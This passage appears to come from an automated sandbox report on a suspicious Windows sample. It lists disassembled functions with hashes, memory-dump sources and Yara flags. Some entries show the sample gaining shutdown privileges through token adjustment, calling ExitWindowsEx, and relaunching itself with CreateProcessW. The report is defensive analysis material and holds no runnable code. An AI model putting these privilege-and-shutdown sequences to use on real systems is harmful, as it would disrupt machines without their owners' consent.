                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _get_daylight$_errno_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3559991230-0
                          • Opcode ID: d84d57091f44413cdc9148be0dd6de948942e62ba8049d02f095d25ff52d526e
                          • Instruction ID: 98f5f661348231132a625482f51f1348618e63428d9fad6c25db781f9edddb00
                          • Opcode Fuzzy Hash: d84d57091f44413cdc9148be0dd6de948942e62ba8049d02f095d25ff52d526e
                          • Instruction Fuzzy Hash: 00912772B542964BF75C8B28E981BD876B7F3A5340F54A13DEA058BB94DB38DF028740
                          Function 000001CFB960D1D7 Relevance: 3.0, APIs: 2, Instructions: 23shutdownCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 000001CFB960EC30: GetModuleFileNameW.KERNEL32 ref: 000001CFB960EC5B
                            • Part of subcall function 000001CFB960EC30: GetCommandLineW.KERNEL32 ref: 000001CFB960EC61
                            • Part of subcall function 000001CFB960EC30: GetStartupInfoW.KERNEL32 ref: 000001CFB960EC6F
                            • Part of subcall function 000001CFB960EC30: CreateProcessW.KERNEL32 ref: 000001CFB960ECB2
                            • Part of subcall function 000001CFB960EC30: ExitProcess.KERNEL32 ref: 000001CFB960ECBB
                            • Part of subcall function 000001CFB960EC30: lstrlenW.KERNEL32 ref: 000001CFB960ECE0
                          • ExitProcess.KERNEL32 ref: 000001CFB960D1DF
                            • Part of subcall function 000001CFB9609240: GetCurrentProcess.KERNEL32 ref: 000001CFB9609257
                            • Part of subcall function 000001CFB9609240: OpenProcessToken.ADVAPI32 ref: 000001CFB960926A
                            • Part of subcall function 000001CFB9609240: LookupPrivilegeValueW.ADVAPI32 ref: 000001CFB9609295
                            • Part of subcall function 000001CFB9609240: AdjustTokenPrivileges.ADVAPI32 ref: 000001CFB96092B8
                            • Part of subcall function 000001CFB9609240: GetLastError.KERNEL32 ref: 000001CFB96092BE
                            • Part of subcall function 000001CFB9609240: CloseHandle.KERNEL32 ref: 000001CFB96092CD
                          • ExitWindowsEx.USER32 ref: 000001CFB960D1F5
                            • Part of subcall function 000001CFB9609240: CloseHandle.KERNEL32 ref: 000001CFB96092E8
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Exit$CloseHandleToken$AdjustCommandCreateCurrentErrorFileInfoLastLineLookupModuleNameOpenPrivilegePrivilegesStartupValueWindowslstrlen
                          • String ID:
                          • API String ID: 3142400414-0
                          • Opcode ID: 788a4e281b37902058700dad6e42fdf71151ef46b325db7974496d36cbdcfe6c
                          • Instruction ID: c909bd9de12979546194144b4a8a6576bbd0084bb35a2423482b17dc932e552b
                          • Opcode Fuzzy Hash: 788a4e281b37902058700dad6e42fdf71151ef46b325db7974496d36cbdcfe6c
                          • Instruction Fuzzy Hash: FBE01A326944C586F72AA730F592BD9B633BB44765F04453F8A5A42582CF39CED6D600
                          Function 000001CFB95B88F1 Relevance: 2.8, Strings: 2, Instructions: 328COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: @$h
                          • API String ID: 0-1029331998
                          • Opcode ID: a97d71568bbf18846906c7cfef66eb8c9853d60e9d6f82541070b3eacffee3a6
                          • Instruction ID: c84d09991042579d01b48d9ae2232a3fa1e8811e116959133946011223c779bb
                          • Opcode Fuzzy Hash: a97d71568bbf18846906c7cfef66eb8c9853d60e9d6f82541070b3eacffee3a6
                          • Instruction Fuzzy Hash: 9EB19430658B488FEB69EF28D8597EA77E1FB98305F10452EE44AC3251DF38D646CB42
                          Function 000001CFB95BADD1 Relevance: 2.7, Strings: 2, Instructions: 239COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <$<
                          • API String ID: 0-213342407
                          • Opcode ID: 24aada4ce3280c41e272b614e4f9f9879b9851271430bc6b136f973133d6a926
                          • Instruction ID: cd5a7d7d3bc15cc897d978bdb2041b96bf4d3e4636f26c301cd1f9b8e7f6934e
                          • Opcode Fuzzy Hash: 24aada4ce3280c41e272b614e4f9f9879b9851271430bc6b136f973133d6a926
                          • Instruction Fuzzy Hash: 84915EB0554B498FEB98DF28D4D47D53BE5FB09704F0481BEAC0ECE29ADB7489418B90
                          Function 000001CFB9396F70 Relevance: 2.7, Strings: 2, Instructions: 239COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID:
                          • String ID: <$<
                          • API String ID: 0-213342407
                          • Opcode ID: 47459b797082c8b7eb25fa5cb46af73bb2a09a72297e0462ec03d068e4451642
                          • Instruction ID: 31fb2be25084ce2f219f51ca923aacb9527921b16e2a8cbf758d3daa8cdeaa7e
                          • Opcode Fuzzy Hash: 47459b797082c8b7eb25fa5cb46af73bb2a09a72297e0462ec03d068e4451642
                          • Instruction Fuzzy Hash: CB9149B06446498FEB98DF28D4947D53BE5FB08704F1881BEAC4ECE29ACB748941CB90
                          Function 000001CFB95BE131 Relevance: 2.7, Strings: 2, Instructions: 220COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $h
                          • API String ID: 0-1972213566
                          • Opcode ID: 8d2d61350d6f293ff3527d0ff84e7f1ed3c0625585c1f404535a63bcadf46a6a
                          • Instruction ID: f883986aadee4361b1018d06f95ed75ae0bbf684160031f4d63363ccbb56d298
                          • Opcode Fuzzy Hash: 8d2d61350d6f293ff3527d0ff84e7f1ed3c0625585c1f404535a63bcadf46a6a
                          • Instruction Fuzzy Hash: 1C718E35598A8C8BFB25EF58D855BEA77F2FB94300F44413EE40AC2191DF34DA468A82
                          Function 000001CFB95B9081 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: @$h
                          • API String ID: 0-1029331998
                          • Opcode ID: 8242a0b38d6739619cea6be2c0619ee53481b112f57f2e9511afeb4914a93e91
                          • Instruction ID: 184d2cf08e31e02c58d26b45969c8944794b50a6d035af2f453230b14bf197c5
                          • Opcode Fuzzy Hash: 8242a0b38d6739619cea6be2c0619ee53481b112f57f2e9511afeb4914a93e91
                          • Instruction Fuzzy Hash: BE51A23055CB888FEB24EF58D896BEAB7F1FB98304F10452EA44AC3151DB74DA05CB82
                          Function 000001CFB95B6281 Relevance: 2.0, APIs: 1, Instructions: 508COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo_localtime64malloc
                          • String ID:
                          • API String ID: 1702167547-0
                          • Opcode ID: 44d2e760dda43dbf13317c7bf008e214a40517cd38aa3ded51e03e7d631a4a7d
                          • Instruction ID: 594d950ff16d14e9ef40ec67f0a45c4ff400bac4d208a96c1927163128899759
                          • Opcode Fuzzy Hash: 44d2e760dda43dbf13317c7bf008e214a40517cd38aa3ded51e03e7d631a4a7d
                          • Instruction Fuzzy Hash: 19026031254A498BEB19EF64D895BEAB7F5FB54300F10462EE44BC31A1DF34EA46CB81
                          Function 000001CFB9602850 Relevance: 1.8, Strings: 1, Instructions: 599COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: [RO] %ld bytes
                          • API String ID: 0-772938740
                          • Opcode ID: 218e82a59ff176e99e028429beedeec697ba52a67a3518fe24719756c9e29cb6
                          • Instruction ID: 28786784c49d61b41d24a69036c78cc6577665db7e6f7851566a808771f11edc
                          • Opcode Fuzzy Hash: 218e82a59ff176e99e028429beedeec697ba52a67a3518fe24719756c9e29cb6
                          • Instruction Fuzzy Hash: A552BE332092C48BD369CF29E48079EBBB2F365B48F448129DBC587B45DB78D955CB50
                          Function 000001CFB960D228 Relevance: 1.5, APIs: 1, Instructions: 18shutdownCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 000001CFB9609240: GetCurrentProcess.KERNEL32 ref: 000001CFB9609257
                            • Part of subcall function 000001CFB9609240: OpenProcessToken.ADVAPI32 ref: 000001CFB960926A
                            • Part of subcall function 000001CFB9609240: LookupPrivilegeValueW.ADVAPI32 ref: 000001CFB9609295
                            • Part of subcall function 000001CFB9609240: AdjustTokenPrivileges.ADVAPI32 ref: 000001CFB96092B8
                            • Part of subcall function 000001CFB9609240: GetLastError.KERNEL32 ref: 000001CFB96092BE
                            • Part of subcall function 000001CFB9609240: CloseHandle.KERNEL32 ref: 000001CFB96092CD
                          • ExitWindowsEx.USER32 ref: 000001CFB960D237
                            • Part of subcall function 000001CFB9609240: CloseHandle.KERNEL32 ref: 000001CFB96092E8
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                          • String ID:
                          • API String ID: 681424410-0
                          • Opcode ID: 93a8e1aa9685086c030a71d488bf693f7fa0a72fa2686f4aa742a69fa3c107b5
                          • Instruction ID: ed91b83b7c027b8ad30fa5463758637895bb2f04cce32200113d8ca4e6a378b6
                          • Opcode Fuzzy Hash: 93a8e1aa9685086c030a71d488bf693f7fa0a72fa2686f4aa742a69fa3c107b5
                          • Instruction Fuzzy Hash: 04E0C2332840C081F32AA720F482BD9B233B780324F04413B4A4E021C2CF38CAC7DA00
                          Function 000001CFB960D207 Relevance: 1.5, APIs: 1, Instructions: 18shutdownCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 000001CFB9609240: GetCurrentProcess.KERNEL32 ref: 000001CFB9609257
                            • Part of subcall function 000001CFB9609240: OpenProcessToken.ADVAPI32 ref: 000001CFB960926A
                            • Part of subcall function 000001CFB9609240: LookupPrivilegeValueW.ADVAPI32 ref: 000001CFB9609295
                            • Part of subcall function 000001CFB9609240: AdjustTokenPrivileges.ADVAPI32 ref: 000001CFB96092B8
                            • Part of subcall function 000001CFB9609240: GetLastError.KERNEL32 ref: 000001CFB96092BE
                            • Part of subcall function 000001CFB9609240: CloseHandle.KERNEL32 ref: 000001CFB96092CD
                          • ExitWindowsEx.USER32 ref: 000001CFB960D216
                            • Part of subcall function 000001CFB9609240: CloseHandle.KERNEL32 ref: 000001CFB96092E8
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                          • String ID:
                          • API String ID: 681424410-0
                          • Opcode ID: f9c136346c28e24139ecf9977f6f02e26cd8405fe4c95f24200669176c7a3179
                          • Instruction ID: eb5a1030821172c7ca6e446dfd4c1e54f3eaa25ade0f3891b7bf7fc9086d841b
                          • Opcode Fuzzy Hash: f9c136346c28e24139ecf9977f6f02e26cd8405fe4c95f24200669176c7a3179
                          • Instruction Fuzzy Hash: 7AE0C2332840C081F32AA721F482BD9B233B780324F04413B4A4E021C2CF38CAC7CA00
                          Function 000001CFB95B2E51 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0u
                          • API String ID: 0-3203441087
                          • Opcode ID: a50af36ce21d724d32510f30f67425397a92edc2e917600e6b54eddaabb5a364
                          • Instruction ID: a131127682b71e1c971cfde7ebd4d9a972b3b7044b9c3ef003ebae72fb441bc7
                          • Opcode Fuzzy Hash: a50af36ce21d724d32510f30f67425397a92edc2e917600e6b54eddaabb5a364
                          • Instruction Fuzzy Hash: 3A91837051CB488FE768DF28D4457AAB7E1FB98704F10492EE58EC3251DB38E9468B86
                          Function 000001CFB95C08A1 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <
                          • API String ID: 0-4251816714
                          • Opcode ID: 2d6702176b69cc6d6af2b854d888f0dc5976ce2415f525eedc55411690976e19
                          • Instruction ID: 9083c99a5997074d38f6860cfdffa8ff082e8211902815607b0c722edcb3d096
                          • Opcode Fuzzy Hash: 2d6702176b69cc6d6af2b854d888f0dc5976ce2415f525eedc55411690976e19
                          • Instruction Fuzzy Hash: 0851BD31248A088FFB54EF28DC49BA577F2FB99305F50812DE44AC76A0DF39D9468B81
                          Function 000001CFB95B2321 Relevance: .8, Instructions: 814COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a9178eafdae48648c701357c9b4d2abeaac436571c9b2d13e72b69692db90ecf
                          • Instruction ID: 2735e11f0debebf2fa7f002991b456f5f3d721e8f9c47271a7cb16ddef2a51fa
                          • Opcode Fuzzy Hash: a9178eafdae48648c701357c9b4d2abeaac436571c9b2d13e72b69692db90ecf
                          • Instruction Fuzzy Hash: 03627C302587898FE769CF1CC5817A5BBE1FB69300F54856DD8CACB742D630E946CBA2
                          Function 000001CFB9392880 Relevance: .8, Instructions: 813COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 85f7673b5705745678ab15cf1bc7445a9931d7babfdc20a30f97ec3237345cf9
                          • Instruction ID: a88bf058367469e8fd2fb594ab275a97a43738abd658ac051545064acad51160
                          • Opcode Fuzzy Hash: 85f7673b5705745678ab15cf1bc7445a9931d7babfdc20a30f97ec3237345cf9
                          • Instruction Fuzzy Hash: 00626930618B858FE769CF1CC481799BBE1FB59300F58856DD8CACB782D670E946CB92
                          Function 000001CFB960A310 Relevance: .6, Instructions: 625COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9ccd6d35c154ce40b5ae276d5133331140d23bdc9e0cb74280d7a7c6ed341ca4
                          • Instruction ID: a00c6419f38f2c0fae92eeb28d7181981e58f5d448799c6b0a251b6a36795e6f
                          • Opcode Fuzzy Hash: 9ccd6d35c154ce40b5ae276d5133331140d23bdc9e0cb74280d7a7c6ed341ca4
                          • Instruction Fuzzy Hash: 8D22C477B785514BD71CCB19E892FA977A2F394308709A52CEA17D3F44DA3DEA06CA00
                          Function 000001CFB95C0271 Relevance: .5, Instructions: 451COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo$malloc
                          • String ID:
                          • API String ID: 610097836-0
                          • Opcode ID: e7f111ba5dc29d1d22144977cf958d959f161eb9f5cb80e62a8ccba1b0c60566
                          • Instruction ID: d7cf94b291389d6f1a76a89ac4a008aa67db69bf307a6e39a52366c93c0430ae
                          • Opcode Fuzzy Hash: e7f111ba5dc29d1d22144977cf958d959f161eb9f5cb80e62a8ccba1b0c60566
                          • Instruction Fuzzy Hash: 24F18E31558A48CFF768EF28EC95BA977F1FB95301F10422EA446C65A1DF38DA42CB81
                          Function 000001CFB9311DAD Relevance: .4, Instructions: 429COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
                          • Instruction ID: 06869663c125a260a12dc0996e0b28d7533fec084504c1edd048595dc3c7dcce
                          • Opcode Fuzzy Hash: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
                          • Instruction Fuzzy Hash: 7CE17731658A598BEB68DF64D889BEDB7F5FF58301F14422DE84AC3250DF30EA528781
                          Function 000001CFB9313065 Relevance: .4, Instructions: 405COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                          • Instruction ID: 1aeb20cd4cae5365d13f1c0420ca3e24822558dd5ff77a452e4f31a74c402725
                          • Opcode Fuzzy Hash: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                          • Instruction Fuzzy Hash: 47D14F31508A488BDF59DF28C889AEAB7E6FF94310F18466DE88AC7155DF30E946CB41
                          Function 000001CFB95B5421 Relevance: .4, Instructions: 373COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f152fd4d6385ee60000525402d296bb86b16f2d3e42963ade6acf54a13ba947
                          • Instruction ID: 93cc55f34d1d1e57989c6639b7d3307c92fb15131f633ada95fc175b28d539ee
                          • Opcode Fuzzy Hash: 4f152fd4d6385ee60000525402d296bb86b16f2d3e42963ade6acf54a13ba947
                          • Instruction Fuzzy Hash: C1C1E034688A498BEB5CDF2CD585BB9B3E2FB59301F10422DD95AC7586DB30ED538B80
                          Function 000001CFB95B36A1 Relevance: .4, Instructions: 373COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5f9ff294b404581f08feed0f29f9b55a6eb06d3d4334dc09e2da6a0d4b1fcafa
                          • Instruction ID: d9fd2b146fdc10374010290fd528c7d54c6b34b8ff1deafc62c21f5dda2e55ad
                          • Opcode Fuzzy Hash: 5f9ff294b404581f08feed0f29f9b55a6eb06d3d4334dc09e2da6a0d4b1fcafa
                          • Instruction Fuzzy Hash: 53C1C034689E494BEB59DF2CC585BB9B3E2FB95300F10422DE85AD7685DB30ED538B80
                          Function 000001CFB95B6FE1 Relevance: .3, Instructions: 300COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5798e1544e650f95b40f9061c22e2bd83b7a927371cc76c98018ac4bb4a914d0
                          • Instruction ID: f7ee7db15bf166c54128a7d3ef4efab8edb9044c47aa0ac1624b2e6d847f8843
                          • Opcode Fuzzy Hash: 5798e1544e650f95b40f9061c22e2bd83b7a927371cc76c98018ac4bb4a914d0
                          • Instruction Fuzzy Hash: 17A1C43055CA488FEB58EF58D895AEDB7F5FB98300F10422EE44AD71A5DB34DA42CB81
                          Function 000001CFB93A6C50 Relevance: .3, Instructions: 284COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
                          • Instruction ID: 3f62919d8970f7d0a08257bfe161d7ec301af30aed1d66e0b939c9f9541123c4
                          • Opcode Fuzzy Hash: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
                          • Instruction Fuzzy Hash: 4E71C8347A42854BEB0C8E1CD88577876DAEB8630AB7CE17DDAD7CB247DA30D9438548
                          Function 000001CFB9313F49 Relevance: .3, Instructions: 283COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2464d5d1c8744b7938e622091fc8299d1c098dc56941e33080af8fbc6eb05a52
                          • Instruction ID: 3db2b33052fde0fa43edc879494603dff5fb9813496a433b66532c84b701a11a
                          • Opcode Fuzzy Hash: 2464d5d1c8744b7938e622091fc8299d1c098dc56941e33080af8fbc6eb05a52
                          • Instruction Fuzzy Hash: 54A13D71508A4C8FDB55EF28C889BEA77F9FB68315F14466EE84AC7160EB30D645CB80
                          Function 000001CFB9622864 Relevance: .2, Instructions: 173COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
                          • Instruction ID: 394bbdfb1d0ef4576b10af8b2a2a1cffdab4c2b0079e620fe4634424b7e5055a
                          • Opcode Fuzzy Hash: 5e1e48596fdf5ea50ef3df4a9aab293c2a7286e8955242186005ffd8a8896482
                          • Instruction Fuzzy Hash: 42518C72B592A28BE7689F19E404FA83ABAF394341F61903D9A1297A80D775CD52CB00
                          Function 00007FF6F6085050 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7dc9773e29b9943d0f431ef1d083e1a96af14bfd7a0c89f44e59958600268bc4
                          • Instruction ID: 043cbdd95609bf53503799eaa78765c77eeab3109646a951519abc227a61b818
                          • Opcode Fuzzy Hash: 7dc9773e29b9943d0f431ef1d083e1a96af14bfd7a0c89f44e59958600268bc4
                          • Instruction Fuzzy Hash: 52E01287E9EED145F3F3C1740D6A4B81FD49AB250872E4076CA68522E3BC0B2C095A91
                          Function 000001CFB9626190 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
